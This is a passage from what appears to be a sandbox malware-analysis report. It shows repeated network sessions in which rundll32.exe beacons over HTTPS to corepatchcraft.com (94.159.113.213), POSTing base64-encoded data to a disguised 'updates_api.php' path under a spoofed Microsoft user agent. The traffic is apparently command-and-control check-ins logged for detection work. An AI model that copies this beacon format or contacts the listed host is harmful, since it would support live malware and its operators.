                        2025-01-16 05:03:37 UTC249OUTData Raw: 64 61 74 61 3d 65 79 4a 44 53 33 6f 69 4f 69 4a 49 54 69 74 4f 49 69 77 69 52 6e 4e 30 54 43 49 36 49 6b 67 72 62 6e 6c 48 53 33 64 68 52 6a 6c 70 51 55 35 6c 4d 33 46 70 61 30 31 47 55 56 70 4e 50 53 49 73 49 6e 5a 5a 64 45 49 69 4f 69 4a 50 5a 55 64 6a 49 69 77 69 64 6d 39 4b 59 79 49 36 49 6b 78 4e 56 31 5a 51 55 54 30 39 49 69 77 69 64 30 46 6a 53 43 49 36 49 6b 68 4e 54 33 68 51 4c 31 46 46 5a 54 5a 78 52 45 34 30 5a 6a 4d 69 4c 43 4a 34 5a 55 4e 6a 61 6c 4d 69 4f 69 4a 48 4f 44 5a 35 54 69 39 5a 50 53 49 73 49 6e 6c 70 61 56 56 59 57 53 49 36 49 6b 64 61 51 30 52 44 5a 6b 5a 61 54 57 5a 59 59 57 52 51 56 31 56 33 55 56 49 76 54 69 39 4d 4d 30 74 54 4d 31 49 7a 65 54 4a 50 53 55 34 32 64 6e 67 72 63 48 4e 78 4e 6e 4d 39 49 6e 30 3d
                        Data Ascii: data=eyJDS3oiOiJITitOIiwiRnN0TCI6IkgrbnlHS3dhRjlpQU5lM3Fpa01GUVpNPSIsInZZdEIiOiJPZUdjIiwidm9KYyI6IkxNV1ZQUT09Iiwid0FjSCI6IkhNT3hQL1FFZTZxRE40ZjMiLCJ4ZUNjalMiOiJHODZ5Ti9ZPSIsInlpaVVYWSI6IkdaQ0RDZkZaTWZYYWRQV1V3UVIvTi9MM0tTM1IzeTJPSU42dngrcHNxNnM9In0=
                        2025-01-16 05:03:38 UTC217INHTTP/1.1 200 OK
                        Date: Thu, 16 Jan 2025 05:03:38 GMT
                        Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                        X-Powered-By: PHP/8.2.12
                        Content-Length: 20
                        Connection: close
                        Content-Type: text/html; charset=UTF-8
                        2025-01-16 05:03:38 UTC20INData Raw: 65 79 4a 55 55 47 51 69 4f 69 4a 50 5a 55 64 6a 49 6e 30 3d
                        Data Ascii: eyJUUGQiOiJPZUdjIn0=


                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                        76192.168.2.66445594.159.113.2134432800C:\Windows\SysWOW64\rundll32.exe
                        TimestampBytes transferredDirectionData
                        2025-01-16 05:03:39 UTC250OUTPOST /updates/system-components/2025-release/updates_api.php HTTP/1.1
                        User-Agent: Microsoft-WNS/10.0
                        Content-Type: application/x-www-form-urlencoded
                        Accept-Language: fr-CA
                        Host: corepatchcraft.com
                        Content-Length: 249
                        Cache-Control: no-cache
                        2025-01-16 05:03:39 UTC249OUTData Raw: 64 61 74 61 3d 65 79 4a 44 53 33 6f 69 4f 69 4a 49 54 69 74 4f 49 69 77 69 52 6e 4e 30 54 43 49 36 49 6b 67 72 62 6e 6c 48 53 33 64 68 52 6a 6c 70 51 55 35 6c 4d 33 46 70 61 30 31 47 55 56 70 4e 50 53 49 73 49 6e 5a 5a 64 45 49 69 4f 69 4a 50 5a 55 64 6a 49 69 77 69 64 6d 39 4b 59 79 49 36 49 6b 78 4e 56 31 5a 51 55 54 30 39 49 69 77 69 64 30 46 6a 53 43 49 36 49 6b 68 4e 54 33 68 51 4c 31 46 46 5a 54 5a 78 52 45 34 30 5a 6a 4d 69 4c 43 4a 34 5a 55 4e 6a 61 6c 4d 69 4f 69 4a 48 4f 44 5a 35 54 69 39 5a 50 53 49 73 49 6e 6c 70 61 56 56 59 57 53 49 36 49 6b 64 61 51 30 52 44 5a 6b 5a 61 54 57 5a 59 59 57 52 51 56 31 56 33 55 56 49 76 54 69 39 4d 4d 30 74 54 4d 31 49 7a 65 54 4a 50 53 55 34 32 64 6e 67 72 63 48 4e 78 4e 6e 4d 39 49 6e 30 3d
                        Data Ascii: data=eyJDS3oiOiJITitOIiwiRnN0TCI6IkgrbnlHS3dhRjlpQU5lM3Fpa01GUVpNPSIsInZZdEIiOiJPZUdjIiwidm9KYyI6IkxNV1ZQUT09Iiwid0FjSCI6IkhNT3hQL1FFZTZxRE40ZjMiLCJ4ZUNjalMiOiJHODZ5Ti9ZPSIsInlpaVVYWSI6IkdaQ0RDZkZaTWZYYWRQV1V3UVIvTi9MM0tTM1IzeTJPSU42dngrcHNxNnM9In0=
                        2025-01-16 05:03:39 UTC217INHTTP/1.1 200 OK
                        Date: Thu, 16 Jan 2025 05:03:39 GMT
                        Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                        X-Powered-By: PHP/8.2.12
                        Content-Length: 20
                        Connection: close
                        Content-Type: text/html; charset=UTF-8
                        2025-01-16 05:03:39 UTC20INData Raw: 65 79 4a 55 55 47 51 69 4f 69 4a 50 5a 55 64 6a 49 6e 30 3d
                        Data Ascii: eyJUUGQiOiJPZUdjIn0=


                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                        77192.168.2.66445694.159.113.2134432800C:\Windows\SysWOW64\rundll32.exe
                        TimestampBytes transferredDirectionData
                        2025-01-16 05:03:40 UTC250OUTPOST /updates/system-components/2025-release/updates_api.php HTTP/1.1
                        User-Agent: Microsoft-WNS/10.0
                        Content-Type: application/x-www-form-urlencoded
                        Accept-Language: fr-CA
                        Host: corepatchcraft.com
                        Content-Length: 249
                        Cache-Control: no-cache
                        2025-01-16 05:03:40 UTC249OUTData Raw: 64 61 74 61 3d 65 79 4a 44 53 33 6f 69 4f 69 4a 49 54 69 74 4f 49 69 77 69 52 6e 4e 30 54 43 49 36 49 6b 67 72 62 6e 6c 48 53 33 64 68 52 6a 6c 70 51 55 35 6c 4d 33 46 70 61 30 31 47 55 56 70 4e 50 53 49 73 49 6e 5a 5a 64 45 49 69 4f 69 4a 50 5a 55 64 6a 49 69 77 69 64 6d 39 4b 59 79 49 36 49 6b 78 4e 56 31 5a 51 55 54 30 39 49 69 77 69 64 30 46 6a 53 43 49 36 49 6b 68 4e 54 33 68 51 4c 31 46 46 5a 54 5a 78 52 45 34 30 5a 6a 4d 69 4c 43 4a 34 5a 55 4e 6a 61 6c 4d 69 4f 69 4a 48 4f 44 5a 35 54 69 39 5a 50 53 49 73 49 6e 6c 70 61 56 56 59 57 53 49 36 49 6b 64 61 51 30 52 44 5a 6b 5a 61 54 57 5a 59 59 57 52 51 56 31 56 33 55 56 49 76 54 69 39 4d 4d 30 74 54 4d 31 49 7a 65 54 4a 50 53 55 34 32 64 6e 67 72 63 48 4e 78 4e 6e 4d 39 49 6e 30 3d
                        Data Ascii: data=eyJDS3oiOiJITitOIiwiRnN0TCI6IkgrbnlHS3dhRjlpQU5lM3Fpa01GUVpNPSIsInZZdEIiOiJPZUdjIiwidm9KYyI6IkxNV1ZQUT09Iiwid0FjSCI6IkhNT3hQL1FFZTZxRE40ZjMiLCJ4ZUNjalMiOiJHODZ5Ti9ZPSIsInlpaVVYWSI6IkdaQ0RDZkZaTWZYYWRQV1V3UVIvTi9MM0tTM1IzeTJPSU42dngrcHNxNnM9In0=
                        2025-01-16 05:03:41 UTC217INHTTP/1.1 200 OK
                        Date: Thu, 16 Jan 2025 05:03:40 GMT
                        Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                        X-Powered-By: PHP/8.2.12
                        Content-Length: 20
                        Connection: close
                        Content-Type: text/html; charset=UTF-8
                        2025-01-16 05:03:41 UTC20INData Raw: 65 79 4a 55 55 47 51 69 4f 69 4a 50 5a 55 64 6a 49 6e 30 3d
                        Data Ascii: eyJUUGQiOiJPZUdjIn0=


                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                        78192.168.2.66445794.159.113.2134432800C:\Windows\SysWOW64\rundll32.exe
                        TimestampBytes transferredDirectionData
                        2025-01-16 05:03:42 UTC250OUTPOST /updates/system-components/2025-release/updates_api.php HTTP/1.1
                        User-Agent: Microsoft-WNS/10.0
                        Content-Type: application/x-www-form-urlencoded
                        Accept-Language: fr-CA
                        Host: corepatchcraft.com
                        Content-Length: 249
                        Cache-Control: no-cache
                        2025-01-16 05:03:42 UTC249OUTData Raw: 64 61 74 61 3d 65 79 4a 44 53 33 6f 69 4f 69 4a 49 54 69 74 4f 49 69 77 69 52 6e 4e 30 54 43 49 36 49 6b 67 72 62 6e 6c 48 53 33 64 68 52 6a 6c 70 51 55 35 6c 4d 33 46 70 61 30 31 47 55 56 70 4e 50 53 49 73 49 6e 5a 5a 64 45 49 69 4f 69 4a 50 5a 55 64 6a 49 69 77 69 64 6d 39 4b 59 79 49 36 49 6b 78 4e 56 31 5a 51 55 54 30 39 49 69 77 69 64 30 46 6a 53 43 49 36 49 6b 68 4e 54 33 68 51 4c 31 46 46 5a 54 5a 78 52 45 34 30 5a 6a 4d 69 4c 43 4a 34 5a 55 4e 6a 61 6c 4d 69 4f 69 4a 48 4f 44 5a 35 54 69 39 5a 50 53 49 73 49 6e 6c 70 61 56 56 59 57 53 49 36 49 6b 64 61 51 30 52 44 5a 6b 5a 61 54 57 5a 59 59 57 52 51 56 31 56 33 55 56 49 76 54 69 39 4d 4d 30 74 54 4d 31 49 7a 65 54 4a 50 53 55 34 32 64 6e 67 72 63 48 4e 78 4e 6e 4d 39 49 6e 30 3d
                        Data Ascii: data=eyJDS3oiOiJITitOIiwiRnN0TCI6IkgrbnlHS3dhRjlpQU5lM3Fpa01GUVpNPSIsInZZdEIiOiJPZUdjIiwidm9KYyI6IkxNV1ZQUT09Iiwid0FjSCI6IkhNT3hQL1FFZTZxRE40ZjMiLCJ4ZUNjalMiOiJHODZ5Ti9ZPSIsInlpaVVYWSI6IkdaQ0RDZkZaTWZYYWRQV1V3UVIvTi9MM0tTM1IzeTJPSU42dngrcHNxNnM9In0=
                        2025-01-16 05:03:42 UTC217INHTTP/1.1 200 OK
                        Date: Thu, 16 Jan 2025 05:03:42 GMT
                        Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                        X-Powered-By: PHP/8.2.12
                        Content-Length: 20
                        Connection: close
                        Content-Type: text/html; charset=UTF-8
                        2025-01-16 05:03:42 UTC20INData Raw: 65 79 4a 55 55 47 51 69 4f 69 4a 50 5a 55 64 6a 49 6e 30 3d
                        Data Ascii: eyJUUGQiOiJPZUdjIn0=


                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                        79192.168.2.66445894.159.113.2134432800C:\Windows\SysWOW64\rundll32.exe
                        TimestampBytes transferredDirectionData
                        2025-01-16 05:03:43 UTC250OUTPOST /updates/system-components/2025-release/updates_api.php HTTP/1.1
                        User-Agent: Microsoft-WNS/10.0
                        Content-Type: application/x-www-form-urlencoded
                        Accept-Language: fr-CA
                        Host: corepatchcraft.com
                        Content-Length: 249
                        Cache-Control: no-cache
                        2025-01-16 05:03:43 UTC249OUTData Raw: 64 61 74 61 3d 65 79 4a 44 53 33 6f 69 4f 69 4a 49 54 69 74 4f 49 69 77 69 52 6e 4e 30 54 43 49 36 49 6b 67 72 62 6e 6c 48 53 33 64 68 52 6a 6c 70 51 55 35 6c 4d 33 46 70 61 30 31 47 55 56 70 4e 50 53 49 73 49 6e 5a 5a 64 45 49 69 4f 69 4a 50 5a 55 64 6a 49 69 77 69 64 6d 39 4b 59 79 49 36 49 6b 78 4e 56 31 5a 51 55 54 30 39 49 69 77 69 64 30 46 6a 53 43 49 36 49 6b 68 4e 54 33 68 51 4c 31 46 46 5a 54 5a 78 52 45 34 30 5a 6a 4d 69 4c 43 4a 34 5a 55 4e 6a 61 6c 4d 69 4f 69 4a 48 4f 44 5a 35 54 69 39 5a 50 53 49 73 49 6e 6c 70 61 56 56 59 57 53 49 36 49 6b 64 61 51 30 52 44 5a 6b 5a 61 54 57 5a 59 59 57 52 51 56 31 56 33 55 56 49 76 54 69 39 4d 4d 30 74 54 4d 31 49 7a 65 54 4a 50 53 55 34 32 64 6e 67 72 63 48 4e 78 4e 6e 4d 39 49 6e 30 3d
                        Data Ascii: data=eyJDS3oiOiJITitOIiwiRnN0TCI6IkgrbnlHS3dhRjlpQU5lM3Fpa01GUVpNPSIsInZZdEIiOiJPZUdjIiwidm9KYyI6IkxNV1ZQUT09Iiwid0FjSCI6IkhNT3hQL1FFZTZxRE40ZjMiLCJ4ZUNjalMiOiJHODZ5Ti9ZPSIsInlpaVVYWSI6IkdaQ0RDZkZaTWZYYWRQV1V3UVIvTi9MM0tTM1IzeTJPSU42dngrcHNxNnM9In0=
                        2025-01-16 05:03:43 UTC217INHTTP/1.1 200 OK
                        Date: Thu, 16 Jan 2025 05:03:43 GMT
                        Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                        X-Powered-By: PHP/8.2.12
                        Content-Length: 20
                        Connection: close
                        Content-Type: text/html; charset=UTF-8
                        2025-01-16 05:03:43 UTC20INData Raw: 65 79 4a 55 55 47 51 69 4f 69 4a 50 5a 55 64 6a 49 6e 30 3d
                        Data Ascii: eyJUUGQiOiJPZUdjIn0=


                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                        80192.168.2.66445994.159.113.2134432800C:\Windows\SysWOW64\rundll32.exe
                        TimestampBytes transferredDirectionData
                        2025-01-16 05:03:44 UTC250OUTPOST /updates/system-components/2025-release/updates_api.php HTTP/1.1
                        User-Agent: Microsoft-WNS/10.0
                        Content-Type: application/x-www-form-urlencoded
                        Accept-Language: fr-CA
                        Host: corepatchcraft.com
                        Content-Length: 249
                        Cache-Control: no-cache
                        2025-01-16 05:03:44 UTC249OUTData Raw: 64 61 74 61 3d 65 79 4a 44 53 33 6f 69 4f 69 4a 49 54 69 74 4f 49 69 77 69 52 6e 4e 30 54 43 49 36 49 6b 67 72 62 6e 6c 48 53 33 64 68 52 6a 6c 70 51 55 35 6c 4d 33 46 70 61 30 31 47 55 56 70 4e 50 53 49 73 49 6e 5a 5a 64 45 49 69 4f 69 4a 50 5a 55 64 6a 49 69 77 69 64 6d 39 4b 59 79 49 36 49 6b 78 4e 56 31 5a 51 55 54 30 39 49 69 77 69 64 30 46 6a 53 43 49 36 49 6b 68 4e 54 33 68 51 4c 31 46 46 5a 54 5a 78 52 45 34 30 5a 6a 4d 69 4c 43 4a 34 5a 55 4e 6a 61 6c 4d 69 4f 69 4a 48 4f 44 5a 35 54 69 39 5a 50 53 49 73 49 6e 6c 70 61 56 56 59 57 53 49 36 49 6b 64 61 51 30 52 44 5a 6b 5a 61 54 57 5a 59 59 57 52 51 56 31 56 33 55 56 49 76 54 69 39 4d 4d 30 74 54 4d 31 49 7a 65 54 4a 50 53 55 34 32 64 6e 67 72 63 48 4e 78 4e 6e 4d 39 49 6e 30 3d
                        Data Ascii: data=eyJDS3oiOiJITitOIiwiRnN0TCI6IkgrbnlHS3dhRjlpQU5lM3Fpa01GUVpNPSIsInZZdEIiOiJPZUdjIiwidm9KYyI6IkxNV1ZQUT09Iiwid0FjSCI6IkhNT3hQL1FFZTZxRE40ZjMiLCJ4ZUNjalMiOiJHODZ5Ti9ZPSIsInlpaVVYWSI6IkdaQ0RDZkZaTWZYYWRQV1V3UVIvTi9MM0tTM1IzeTJPSU42dngrcHNxNnM9In0=
                        2025-01-16 05:03:45 UTC217INHTTP/1.1 200 OK
                        Date: Thu, 16 Jan 2025 05:03:45 GMT
                        Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                        X-Powered-By: PHP/8.2.12
                        Content-Length: 20
                        Connection: close
                        Content-Type: text/html; charset=UTF-8
                        2025-01-16 05:03:45 UTC20INData Raw: 65 79 4a 55 55 47 51 69 4f 69 4a 50 5a 55 64 6a 49 6e 30 3d
                        Data Ascii: eyJUUGQiOiJPZUdjIn0=


                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                        81192.168.2.66446094.159.113.2134432800C:\Windows\SysWOW64\rundll32.exe
                        TimestampBytes transferredDirectionData
                        2025-01-16 05:03:46 UTC250OUTPOST /updates/system-components/2025-release/updates_api.php HTTP/1.1
                        User-Agent: Microsoft-WNS/10.0
                        Content-Type: application/x-www-form-urlencoded
                        Accept-Language: fr-CA
                        Host: corepatchcraft.com
                        Content-Length: 249
                        Cache-Control: no-cache
                        2025-01-16 05:03:46 UTC249OUTData Raw: 64 61 74 61 3d 65 79 4a 44 53 33 6f 69 4f 69 4a 49 54 69 74 4f 49 69 77 69 52 6e 4e 30 54 43 49 36 49 6b 67 72 62 6e 6c 48 53 33 64 68 52 6a 6c 70 51 55 35 6c 4d 33 46 70 61 30 31 47 55 56 70 4e 50 53 49 73 49 6e 5a 5a 64 45 49 69 4f 69 4a 50 5a 55 64 6a 49 69 77 69 64 6d 39 4b 59 79 49 36 49 6b 78 4e 56 31 5a 51 55 54 30 39 49 69 77 69 64 30 46 6a 53 43 49 36 49 6b 68 4e 54 33 68 51 4c 31 46 46 5a 54 5a 78 52 45 34 30 5a 6a 4d 69 4c 43 4a 34 5a 55 4e 6a 61 6c 4d 69 4f 69 4a 48 4f 44 5a 35 54 69 39 5a 50 53 49 73 49 6e 6c 70 61 56 56 59 57 53 49 36 49 6b 64 61 51 30 52 44 5a 6b 5a 61 54 57 5a 59 59 57 52 51 56 31 56 33 55 56 49 76 54 69 39 4d 4d 30 74 54 4d 31 49 7a 65 54 4a 50 53 55 34 32 64 6e 67 72 63 48 4e 78 4e 6e 4d 39 49 6e 30 3d
                        Data Ascii: data=eyJDS3oiOiJITitOIiwiRnN0TCI6IkgrbnlHS3dhRjlpQU5lM3Fpa01GUVpNPSIsInZZdEIiOiJPZUdjIiwidm9KYyI6IkxNV1ZQUT09Iiwid0FjSCI6IkhNT3hQL1FFZTZxRE40ZjMiLCJ4ZUNjalMiOiJHODZ5Ti9ZPSIsInlpaVVYWSI6IkdaQ0RDZkZaTWZYYWRQV1V3UVIvTi9MM0tTM1IzeTJPSU42dngrcHNxNnM9In0=
                        2025-01-16 05:03:46 UTC217INHTTP/1.1 200 OK
                        Date: Thu, 16 Jan 2025 05:03:46 GMT
                        Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                        X-Powered-By: PHP/8.2.12
                        Content-Length: 20
                        Connection: close
                        Content-Type: text/html; charset=UTF-8
                        2025-01-16 05:03:46 UTC20INData Raw: 65 79 4a 55 55 47 51 69 4f 69 4a 50 5a 55 64 6a 49 6e 30 3d
                        Data Ascii: eyJUUGQiOiJPZUdjIn0=


                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                        82192.168.2.66446194.159.113.2134432800C:\Windows\SysWOW64\rundll32.exe
                        TimestampBytes transferredDirectionData
                        2025-01-16 05:03:47 UTC250OUTPOST /updates/system-components/2025-release/updates_api.php HTTP/1.1
                        User-Agent: Microsoft-WNS/10.0
                        Content-Type: application/x-www-form-urlencoded
                        Accept-Language: fr-CA
                        Host: corepatchcraft.com
                        Content-Length: 249
                        Cache-Control: no-cache
                        2025-01-16 05:03:47 UTC249OUTData Raw: 64 61 74 61 3d 65 79 4a 44 53 33 6f 69 4f 69 4a 49 54 69 74 4f 49 69 77 69 52 6e 4e 30 54 43 49 36 49 6b 67 72 62 6e 6c 48 53 33 64 68 52 6a 6c 70 51 55 35 6c 4d 33 46 70 61 30 31 47 55 56 70 4e 50 53 49 73 49 6e 5a 5a 64 45 49 69 4f 69 4a 50 5a 55 64 6a 49 69 77 69 64 6d 39 4b 59 79 49 36 49 6b 78 4e 56 31 5a 51 55 54 30 39 49 69 77 69 64 30 46 6a 53 43 49 36 49 6b 68 4e 54 33 68 51 4c 31 46 46 5a 54 5a 78 52 45 34 30 5a 6a 4d 69 4c 43 4a 34 5a 55 4e 6a 61 6c 4d 69 4f 69 4a 48 4f 44 5a 35 54 69 39 5a 50 53 49 73 49 6e 6c 70 61 56 56 59 57 53 49 36 49 6b 64 61 51 30 52 44 5a 6b 5a 61 54 57 5a 59 59 57 52 51 56 31 56 33 55 56 49 76 54 69 39 4d 4d 30 74 54 4d 31 49 7a 65 54 4a 50 53 55 34 32 64 6e 67 72 63 48 4e 78 4e 6e 4d 39 49 6e 30 3d
                        Data Ascii: data=eyJDS3oiOiJITitOIiwiRnN0TCI6IkgrbnlHS3dhRjlpQU5lM3Fpa01GUVpNPSIsInZZdEIiOiJPZUdjIiwidm9KYyI6IkxNV1ZQUT09Iiwid0FjSCI6IkhNT3hQL1FFZTZxRE40ZjMiLCJ4ZUNjalMiOiJHODZ5Ti9ZPSIsInlpaVVYWSI6IkdaQ0RDZkZaTWZYYWRQV1V3UVIvTi9MM0tTM1IzeTJPSU42dngrcHNxNnM9In0=
                        2025-01-16 05:03:48 UTC217INHTTP/1.1 200 OK
                        Date: Thu, 16 Jan 2025 05:03:47 GMT
                        Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                        X-Powered-By: PHP/8.2.12
                        Content-Length: 20
                        Connection: close
                        Content-Type: text/html; charset=UTF-8
                        2025-01-16 05:03:48 UTC20INData Raw: 65 79 4a 55 55 47 51 69 4f 69 4a 50 5a 55 64 6a 49 6e 30 3d
                        Data Ascii: eyJUUGQiOiJPZUdjIn0=


                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                        83192.168.2.66446294.159.113.2134432800C:\Windows\SysWOW64\rundll32.exe
                        TimestampBytes transferredDirectionData
                        2025-01-16 05:03:49 UTC250OUTPOST /updates/system-components/2025-release/updates_api.php HTTP/1.1
                        User-Agent: Microsoft-WNS/10.0
                        Content-Type: application/x-www-form-urlencoded
                        Accept-Language: fr-CA
                        Host: corepatchcraft.com
                        Content-Length: 249
                        Cache-Control: no-cache
                        2025-01-16 05:03:49 UTC249OUTData Raw: 64 61 74 61 3d 65 79 4a 44 53 33 6f 69 4f 69 4a 49 54 69 74 4f 49 69 77 69 52 6e 4e 30 54 43 49 36 49 6b 67 72 62 6e 6c 48 53 33 64 68 52 6a 6c 70 51 55 35 6c 4d 33 46 70 61 30 31 47 55 56 70 4e 50 53 49 73 49 6e 5a 5a 64 45 49 69 4f 69 4a 50 5a 55 64 6a 49 69 77 69 64 6d 39 4b 59 79 49 36 49 6b 78 4e 56 31 5a 51 55 54 30 39 49 69 77 69 64 30 46 6a 53 43 49 36 49 6b 68 4e 54 33 68 51 4c 31 46 46 5a 54 5a 78 52 45 34 30 5a 6a 4d 69 4c 43 4a 34 5a 55 4e 6a 61 6c 4d 69 4f 69 4a 48 4f 44 5a 35 54 69 39 5a 50 53 49 73 49 6e 6c 70 61 56 56 59 57 53 49 36 49 6b 64 61 51 30 52 44 5a 6b 5a 61 54 57 5a 59 59 57 52 51 56 31 56 33 55 56 49 76 54 69 39 4d 4d 30 74 54 4d 31 49 7a 65 54 4a 50 53 55 34 32 64 6e 67 72 63 48 4e 78 4e 6e 4d 39 49 6e 30 3d
                        Data Ascii: data=eyJDS3oiOiJITitOIiwiRnN0TCI6IkgrbnlHS3dhRjlpQU5lM3Fpa01GUVpNPSIsInZZdEIiOiJPZUdjIiwidm9KYyI6IkxNV1ZQUT09Iiwid0FjSCI6IkhNT3hQL1FFZTZxRE40ZjMiLCJ4ZUNjalMiOiJHODZ5Ti9ZPSIsInlpaVVYWSI6IkdaQ0RDZkZaTWZYYWRQV1V3UVIvTi9MM0tTM1IzeTJPSU42dngrcHNxNnM9In0=
                        2025-01-16 05:03:49 UTC217INHTTP/1.1 200 OK
                        Date: Thu, 16 Jan 2025 05:03:49 GMT
                        Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                        X-Powered-By: PHP/8.2.12
                        Content-Length: 20
                        Connection: close
                        Content-Type: text/html; charset=UTF-8
                        2025-01-16 05:03:49 UTC20INData Raw: 65 79 4a 55 55 47 51 69 4f 69 4a 50 5a 55 64 6a 49 6e 30 3d
                        Data Ascii: eyJUUGQiOiJPZUdjIn0=


                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                        84192.168.2.66446394.159.113.2134432800C:\Windows\SysWOW64\rundll32.exe
                        TimestampBytes transferredDirectionData
                        2025-01-16 05:03:50 UTC250OUTPOST /updates/system-components/2025-release/updates_api.php HTTP/1.1
                        User-Agent: Microsoft-WNS/10.0
                        Content-Type: application/x-www-form-urlencoded
                        Accept-Language: fr-CA
                        Host: corepatchcraft.com
                        Content-Length: 249
                        Cache-Control: no-cache
                        2025-01-16 05:03:50 UTC249OUTData Raw: 64 61 74 61 3d 65 79 4a 44 53 33 6f 69 4f 69 4a 49 54 69 74 4f 49 69 77 69 52 6e 4e 30 54 43 49 36 49 6b 67 72 62 6e 6c 48 53 33 64 68 52 6a 6c 70 51 55 35 6c 4d 33 46 70 61 30 31 47 55 56 70 4e 50 53 49 73 49 6e 5a 5a 64 45 49 69 4f 69 4a 50 5a 55 64 6a 49 69 77 69 64 6d 39 4b 59 79 49 36 49 6b 78 4e 56 31 5a 51 55 54 30 39 49 69 77 69 64 30 46 6a 53 43 49 36 49 6b 68 4e 54 33 68 51 4c 31 46 46 5a 54 5a 78 52 45 34 30 5a 6a 4d 69 4c 43 4a 34 5a 55 4e 6a 61 6c 4d 69 4f 69 4a 48 4f 44 5a 35 54 69 39 5a 50 53 49 73 49 6e 6c 70 61 56 56 59 57 53 49 36 49 6b 64 61 51 30 52 44 5a 6b 5a 61 54 57 5a 59 59 57 52 51 56 31 56 33 55 56 49 76 54 69 39 4d 4d 30 74 54 4d 31 49 7a 65 54 4a 50 53 55 34 32 64 6e 67 72 63 48 4e 78 4e 6e 4d 39 49 6e 30 3d
                        Data Ascii: data=eyJDS3oiOiJITitOIiwiRnN0TCI6IkgrbnlHS3dhRjlpQU5lM3Fpa01GUVpNPSIsInZZdEIiOiJPZUdjIiwidm9KYyI6IkxNV1ZQUT09Iiwid0FjSCI6IkhNT3hQL1FFZTZxRE40ZjMiLCJ4ZUNjalMiOiJHODZ5Ti9ZPSIsInlpaVVYWSI6IkdaQ0RDZkZaTWZYYWRQV1V3UVIvTi9MM0tTM1IzeTJPSU42dngrcHNxNnM9In0=
                        2025-01-16 05:03:50 UTC217INHTTP/1.1 200 OK
                        Date: Thu, 16 Jan 2025 05:03:50 GMT
                        Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                        X-Powered-By: PHP/8.2.12
                        Content-Length: 20
                        Connection: close
                        Content-Type: text/html; charset=UTF-8
                        2025-01-16 05:03:50 UTC20INData Raw: 65 79 4a 55 55 47 51 69 4f 69 4a 50 5a 55 64 6a 49 6e 30 3d
                        Data Ascii: eyJUUGQiOiJPZUdjIn0=


                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                        85192.168.2.66446494.159.113.2134432800C:\Windows\SysWOW64\rundll32.exe
                        TimestampBytes transferredDirectionData
                        2025-01-16 05:03:51 UTC250OUTPOST /updates/system-components/2025-release/updates_api.php HTTP/1.1
                        User-Agent: Microsoft-WNS/10.0
                        Content-Type: application/x-www-form-urlencoded
                        Accept-Language: fr-CA
                        Host: corepatchcraft.com
                        Content-Length: 249
                        Cache-Control: no-cache
                        2025-01-16 05:03:51 UTC249OUTData Raw: 64 61 74 61 3d 65 79 4a 44 53 33 6f 69 4f 69 4a 49 54 69 74 4f 49 69 77 69 52 6e 4e 30 54 43 49 36 49 6b 67 72 62 6e 6c 48 53 33 64 68 52 6a 6c 70 51 55 35 6c 4d 33 46 70 61 30 31 47 55 56 70 4e 50 53 49 73 49 6e 5a 5a 64 45 49 69 4f 69 4a 50 5a 55 64 6a 49 69 77 69 64 6d 39 4b 59 79 49 36 49 6b 78 4e 56 31 5a 51 55 54 30 39 49 69 77 69 64 30 46 6a 53 43 49 36 49 6b 68 4e 54 33 68 51 4c 31 46 46 5a 54 5a 78 52 45 34 30 5a 6a 4d 69 4c 43 4a 34 5a 55 4e 6a 61 6c 4d 69 4f 69 4a 48 4f 44 5a 35 54 69 39 5a 50 53 49 73 49 6e 6c 70 61 56 56 59 57 53 49 36 49 6b 64 61 51 30 52 44 5a 6b 5a 61 54 57 5a 59 59 57 52 51 56 31 56 33 55 56 49 76 54 69 39 4d 4d 30 74 54 4d 31 49 7a 65 54 4a 50 53 55 34 32 64 6e 67 72 63 48 4e 78 4e 6e 4d 39 49 6e 30 3d
                        Data Ascii: data=eyJDS3oiOiJITitOIiwiRnN0TCI6IkgrbnlHS3dhRjlpQU5lM3Fpa01GUVpNPSIsInZZdEIiOiJPZUdjIiwidm9KYyI6IkxNV1ZQUT09Iiwid0FjSCI6IkhNT3hQL1FFZTZxRE40ZjMiLCJ4ZUNjalMiOiJHODZ5Ti9ZPSIsInlpaVVYWSI6IkdaQ0RDZkZaTWZYYWRQV1V3UVIvTi9MM0tTM1IzeTJPSU42dngrcHNxNnM9In0=
                        2025-01-16 05:03:52 UTC217INHTTP/1.1 200 OK
                        Date: Thu, 16 Jan 2025 05:03:51 GMT
                        Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                        X-Powered-By: PHP/8.2.12
                        Content-Length: 20
                        Connection: close
                        Content-Type: text/html; charset=UTF-8
                        2025-01-16 05:03:52 UTC20INData Raw: 65 79 4a 55 55 47 51 69 4f 69 4a 50 5a 55 64 6a 49 6e 30 3d
                        Data Ascii: eyJUUGQiOiJPZUdjIn0=


                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                        86192.168.2.66446594.159.113.2134432800C:\Windows\SysWOW64\rundll32.exe
                        TimestampBytes transferredDirectionData
                        2025-01-16 05:03:53 UTC250OUTPOST /updates/system-components/2025-release/updates_api.php HTTP/1.1
                        User-Agent: Microsoft-WNS/10.0
                        Content-Type: application/x-www-form-urlencoded
                        Accept-Language: fr-CA
                        Host: corepatchcraft.com
                        Content-Length: 249
                        Cache-Control: no-cache
